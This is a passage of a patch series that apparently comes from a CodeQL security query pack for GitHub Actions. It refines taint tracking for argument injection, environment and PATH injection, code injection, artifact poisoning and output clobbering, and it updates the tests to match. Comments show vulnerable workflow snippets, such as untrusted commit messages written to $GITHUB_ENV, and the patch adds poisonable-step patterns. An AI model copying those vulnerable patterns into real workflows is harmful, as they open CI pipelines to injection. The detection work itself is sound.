a dangerous command + * in a Run step. + * Where the command is a string captured from the Run's script. + */ +bindingset[var] +predicate envToArgInjSink(string var, Run run, string command) { + exists(string argument, string cmd, string regexp, int command_group, int argument_group | + run.getACommand() = cmd and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + command = cmd.regexpCapture(regexp, command_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + Bash::envReachingRunExpr(run, var, argument) and + exists(run.getInScopeEnvVarExpr(var)) + ) +} + /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. @@ -21,10 +38,10 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { string command; ArgumentInjectionFromEnvVarSink() { - exists(Run run, string var_name | - envToArgInjSink(var_name, run, command) and + exists(Run run, string var | + envToArgInjSink(var, run, command) and run.getScriptScalar() = this.asExpr() and - exists(run.getInScopeEnvVarExpr(var_name)) + exists(run.getInScopeEnvVarExpr(var)) ) or exists( @@ -42,6 +59,33 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { override string getCommand() { result = command } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to an unsafe argument + * e.g. + * run: | + * BODY=$(git log --format=%s) + * sed "s/FOO/$BODY/g" > /tmp/foo + */ +class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { + string command; + + ArgumentInjectionFromCommandSink() { + exists( + CommandSource source, Run run, string cmd, string argument, string regexp, int argument_group, + int command_group + | + run = source.getEnclosingRun() and + this.asExpr() = run.getScriptScalar() and + cmd = run.getACommand() and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + command = cmd.regexpCapture(regexp, command_group) + ) + } + + override string getCommand() { result = command } +} + /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. */ @@ -71,6 +115,14 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + envToArgInjSink(var, run, _) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index b70155906143..31a9edd03b30 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -274,6 +274,24 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof ArtifactSource } predicate isSink(DataFlow::Node sink) { sink instanceof ArtifactPoisoningSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(PoisonableStep step | + pred instanceof ArtifactSource and + pred.asExpr().(Step).getAFollowingStep() = step and + ( + succ.asExpr() = step.(Run).getScriptScalar() or + succ.asExpr() = step.(UsesStep) + ) + ) + or + exists(Run run | + pred instanceof ArtifactSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe artifacts that is used in an insecure way. */ diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index 8cd589fa9f8c..ca72fe00d161 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -19,6 +19,22 @@ private module CodeInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "code-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index a80032de3209..1f53c9384369 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -14,6 +14,9 @@ abstract class EnvPathInjectionSink extends DataFlow::Node { } * e.g. * run: | * cat foo.txt >> $GITHUB_PATH + * echo "$(cat foo.txt)" >> $GITHUB_PATH + * FOO=$(cat foo.txt) + * echo "$FOO" >> $GITHUB_PATH */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { @@ -25,35 +28,34 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and ( - // e.g. - // cat test-results/.env >> $GITHUB_PATH - Bash::fileToGitHubPath(run, _) - or - exists(string value | - run.getAWriteToGitHubPath(value) and - ( - Bash::outputsPartialFileContent(run, value) - or - // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_PATH", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubPath(run, _) ) ) } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "${COMMIT_MESSAGE}" >> $GITHUB_PATH + */ +class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { + EnvPathInjectionFromCommandSink() { + exists(CommandSource source | + this.asExpr() = source.getEnclosingRun().getScriptScalar() and + Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_PATH", + _) + ) + } +} + /** * Holds if a Run step declares an environment variable, uses it to declare a PATH env var. * e.g. @@ -65,7 +67,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToSpecialFile("GITHUB_PATH", var_name, run, _) and + Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_PATH", _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) @@ -84,6 +86,28 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof EnvPathInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envpath-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate the PATH environment variable. */ diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 65c6938f0a43..dd6b8342185f 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -14,8 +14,12 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } * e.g. * run: | * cat test-results/.env >> $GITHUB_ENV + * * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV * echo "sha=$(> $GITHUB_ENV + * + * FOO=$(cat test-results/sha-number) + * echo "FOO=$FOO" >> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { @@ -27,37 +31,34 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and ( - // e.g. - // cat test-results/.env >> $GITHUB_ENV - Bash::fileToGitHubEnv(run, _) - or - exists(string value | - run.getAWriteToGitHubEnv(_, value) and - ( - // e.g. - // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV - Bash::outputsPartialFileContent(run, value) - or - // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubEnv(run, _) ) ) } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + */ +class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { + EnvVarInjectionFromCommandSink() { + exists(CommandSource source | + this.asExpr() = source.getEnclosingRun().getScriptScalar() and + Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_ENV", + _) + ) + } +} + /** * Holds if a Run step declares an environment variable, uses it to declare env var. * e.g. @@ -69,9 +70,9 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToSpecialFile("GITHUB_ENV", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScriptScalar() = this.asExpr() and + Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_ENV", _) ) } } @@ -104,6 +105,28 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envvar-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 8541286f6e19..4f9eeef75793 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -10,7 +10,7 @@ import codeql.actions.dataflow.FlowSources abstract class OutputClobberingSink extends DataFlow::Node { } /** - * Holds if a Run step declares an environment variable with contents from a local file. + * Holds if a Run step declares a step output variable with contents from a local file. * e.g. * run: | * cat test-results/.vars >> $GITHUB_OUTPUT @@ -21,58 +21,43 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { exists(Run run, Step step | ( - step instanceof UntrustedArtifactDownloadStep or + step instanceof UntrustedArtifactDownloadStep + or // This shoould be: // artifact instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - step.(Uses).getCallee() = "actions/checkout" or - step instanceof GitMutableRefCheckout or - step instanceof GitSHACheckout or - step instanceof GhMutableRefCheckout or + exists(Uses uses | + step = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) + ) + or + step instanceof GitMutableRefCheckout + or + step instanceof GitSHACheckout + or + step instanceof GhMutableRefCheckout + or step instanceof GhSHACheckout ) and - this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and + this.asExpr() = run.getScriptScalar() and ( - // e.g. - // cat test-results/.vars >> $GITHUB_OUTPUT - Bash::fileToGitHubOutput(run, _) - or - exists(string key, string value | - run.getAWriteToGitHubOutput(key, value) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string key2 | - run.getAWriteToGitHubOutput(key2, _) and - not key2 = key - ) and - ( - Bash::outputsPartialFileContent(run, value) - or - // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubOutput(run, _) ) ) } } /** - * Holds if a Run step declares an environment variable, uses it to declare env var. + * Holds if a Run step declares an environment variable, uses it in a step variable output. * e.g. * env: * BODY: ${{ github.event.comment.body }} @@ -81,15 +66,15 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { */ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { OutputClobberingFromEnvVarSink() { - exists(Run run, string var_name, string key | - envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and + exists(Run run, string var, string field | + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string key2 | - run.getAWriteToGitHubOutput(key2, _) and - not key2 = key + exists(string field2 | + run.getAWriteToGitHubOutput(field2, _) and + not field2 = field ) and - exists(run.getInScopeEnvVarExpr(var_name)) and + exists(run.getInScopeEnvVarExpr(var)) and run.getScriptScalar() = this.asExpr() ) } @@ -113,10 +98,9 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { */ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { WorkflowCommandClobberingFromEnvVarSink() { - exists(Run run, string output_line, string clobbering_line, string var_name | - run.getScript().splitAt("\n") = output_line and - Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and - run.getScript().splitAt("\n") = clobbering_line and + exists(Run run, string clobbering_line, string var_name | + Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and + run.getACommand() = clobbering_line and clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() @@ -124,13 +108,36 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { } } +/** + * - id: clob1 + * run: | + * # VULNERABLE + * PR="$(; @@ -93,6 +102,15 @@ private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { uses.getArgumentExpr("ref") = sink.asExpr() ) } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } module ActionsSHACheckoutFlow = TaintTracking::Global; @@ -139,7 +157,7 @@ predicate containsHeadSHA(string s) { "\\bgithub\\.event\\.merge_group\\.head_sha\\b", "\\bgithub\\.event\\.merge_group\\.head_commit\\.id\\b", // heuristics - "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b" + "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bmerge_sha\\b", "\\bpr_head_sha\\b" ], _, _) ) } @@ -156,7 +174,7 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.merge_group\\.head_ref\\b", // heuristics - "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", + "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bmerge_ref\\b", "\\bpr_head_ref\\b", // env vars "GITHUB_HEAD_REF", ], _, _) From 1e749ae6d5ddff29c0bd1bac751c75ab5bbdb2df Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:39 +0200 Subject: [PATCH 576/707] Add new poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 1543e2d8d459..aa5148d7cf63 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -52,6 +52,7 @@ extensions: - ["rails\\s+assets:precompile"] - ["rubocop"] - ["sed\\s+-f"] + - ["sonar-scanner"] - ["stylelint"] - ["terraform"] - ["tflint"] From 99e92af0342654cd86e600f03207b8aa005e7d24 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:57 +0200 Subject: [PATCH 577/707] Update tests --- .../library-tests/poisonable_steps.expected | 2 + ql/test/library-tests/test.ql | 2 +- .../.github/workflows/calling_composite.yml | 0 .../.github/workflows/calling_workflow.yml | 0 .../.github/workflows/reusable_workflow.yml | 0 .../CompositeActionsSinks.expected | 0 .../CompositeActionsSinks.qlref | 0 .../CompositeActionsSources.expected | 0 .../CompositeActionsSources.qlref | 0 .../CompositeActionsSummaries.expected | 0 .../CompositeActionsSummaries.qlref | 0 .../ReusableWorkflowsSinks.expected | 0 .../ReusableWorkflowsSinks.qlref | 0 .../ReusableWorkflowsSources.expected | 0 .../ReusableWorkflowsSources.qlref | 0 .../ReusableWorkflowsSummaries.expected | 0 .../ReusableWorkflowsSummaries.qlref | 0 .../CWE-020 => Models}/action1/action.yml | 0 .../CWE-074/OutputClobberingHigh.expected | 16 +- .../CWE-077/.github/workflows/test13.yml | 23 +++ .../CWE-077/.github/workflows/test14.yml | 30 ++++ .../CWE-077/.github/workflows/test15.yml | 29 ++++ .../CWE-077/.github/workflows/test8.yml | 2 - .../CWE-077/EnvPathInjectionCritical.expected | 11 +- .../CWE-077/EnvPathInjectionMedium.expected | 11 +- .../CWE-077/EnvVarInjectionCritical.expected | 77 +++++---- .../CWE-077/EnvVarInjectionMedium.expected | 65 ++++---- .../.github/workflows/arg_injection.yml | 12 +- .../ArgumentInjectionCritical.expected | 49 +++--- .../CWE-088/ArgumentInjectionMedium.expected | 31 ++-- .../CWE-094/.github/workflows/test.yml | 15 +- .../CWE-094/.github/workflows/test1.yml | 4 +- .../CWE-094/.github/workflows/test14.yml | 51 ++++++ .../CWE-094/.github/workflows/test15.yml | 38 +++++ .../CWE-094/CodeInjectionCritical.expected | 146 +++++++++++------- .../CWE-094/CodeInjectionMedium.expected | 134 ++++++++++------ .../ArtifactPoisoningCritical.expected | 38 ++--- .../CWE-829/ArtifactPoisoningMedium.expected | 38 ++--- 38 files changed, 544 insertions(+), 280 deletions(-) rename ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/calling_composite.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/calling_workflow.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/reusable_workflow.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSinks.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSinks.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSources.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSources.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSummaries.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSummaries.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSinks.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSinks.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSources.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSources.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/action1/action.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index a87ec0a341c3..100eddb14002 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,3 +1,5 @@ +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 5880e06da7fd..03f9e5b18405 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -150,6 +150,6 @@ query predicate isBashParameterExpansion(string parameter, string operator, stri "${parameter21%%pattern}", "${parameter22/pattern/string}", "${parameter23//pattern/string}", ] and - Bash::isBashParameterExpansion(test, parameter, operator, params) + Bash::isParameterExpansion(test, parameter, operator, params) ) } diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml b/ql/test/query-tests/Models/.github/workflows/calling_composite.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml rename to ql/test/query-tests/Models/.github/workflows/calling_composite.yml diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml b/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml rename to ql/test/query-tests/Models/.github/workflows/calling_workflow.yml diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml rename to ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Models/CompositeActionsSinks.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected rename to ql/test/query-tests/Models/CompositeActionsSinks.expected diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref b/ql/test/query-tests/Models/CompositeActionsSinks.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref rename to ql/test/query-tests/Models/CompositeActionsSinks.qlref diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Models/CompositeActionsSources.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected rename to ql/test/query-tests/Models/CompositeActionsSources.expected diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref b/ql/test/query-tests/Models/CompositeActionsSources.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref rename to ql/test/query-tests/Models/CompositeActionsSources.qlref diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Models/CompositeActionsSummaries.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected rename to ql/test/query-tests/Models/CompositeActionsSummaries.expected diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref rename to ql/test/query-tests/Models/CompositeActionsSummaries.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSinks.expected diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Models/ReusableWorkflowsSources.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSources.expected diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSources.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref diff --git a/ql/test/query-tests/Security/CWE-020/action1/action.yml b/ql/test/query-tests/Models/action1/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/action1/action.yml rename to ql/test/query-tests/Models/action1/action.yml diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index b6cb2a32e479..715e2c4c90cc 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected @@ -1,12 +1,12 @@ edges -| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | -| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | -| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | | -| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | | -| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output1.yml:30:9:35:6 | 